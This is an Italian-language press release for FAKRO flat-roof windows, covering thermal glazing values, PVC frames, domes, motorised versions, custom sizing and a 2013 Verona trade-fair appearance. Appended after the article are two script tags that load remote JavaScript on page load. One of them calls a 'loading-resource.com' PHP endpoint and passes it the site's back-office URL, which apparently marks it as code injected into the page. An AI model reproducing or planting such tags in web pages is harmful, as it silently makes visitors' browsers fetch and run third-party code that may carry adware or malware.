La vasta gamma di prodotti FAKRO si arricchisce con le nuove finestre per tetti piani, che assicurano un elevato apporto di luce naturale anche negli ambienti in cui non e possibile installare una classica finestra FAKRO.
Queste finestre possono essere dotate di un vetro con coefficiente termico di unita U6 (Ug = 0.5 W/m2K) o U8 (Ug = 0.3 W/m2K), che migliora il rendimento energetico dell'intero edificio. Nella versione standard la finestra è dotata di una vetrocamera con all’interno un vetro P2A anti‐effrazione.
Tutte le finestre per tetti piani sono disponibili nelle versioni elettriche, manuali e non‐apribili, e sono compatibili con la tenda parasole per esterno e con gli altri accessori interni di FAKRO.
I telai di queste finestre sono profili multicamera in PVC che vengono riempiti con materiale isolante in polistirene. La superficie del telaio visibile dall'esterno è bianca, mentre la parte superiore delle finestre è protetta da una cupola in policarbonato opaca o trasparente. La vasta gamma di finestre per tetti piani include anche una versione senza cupola. L'alta efficienza energetica e la possibilità di produrre formati non standard sono importanti vantaggi di questo sistema. La finestra può essere prodotta su misura della richiesta del Cliente per abbinare la dimensione specifica di apertura o adattarla alle dimensioni dei vecchi lucernari da sostituire.
La finestra per tetti piani può avere un’inclinazione tra 0 e 15° e può essere montata su una base supplementare con un'altezza di 15 cm, che innalza la finestra e ne permette la facile l'installazione.
Appuntamento dal 14 al 17 marzo 2013 a Legno & Edilizia, Pad. 2, Stand A13, Fiera di Verona.
<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>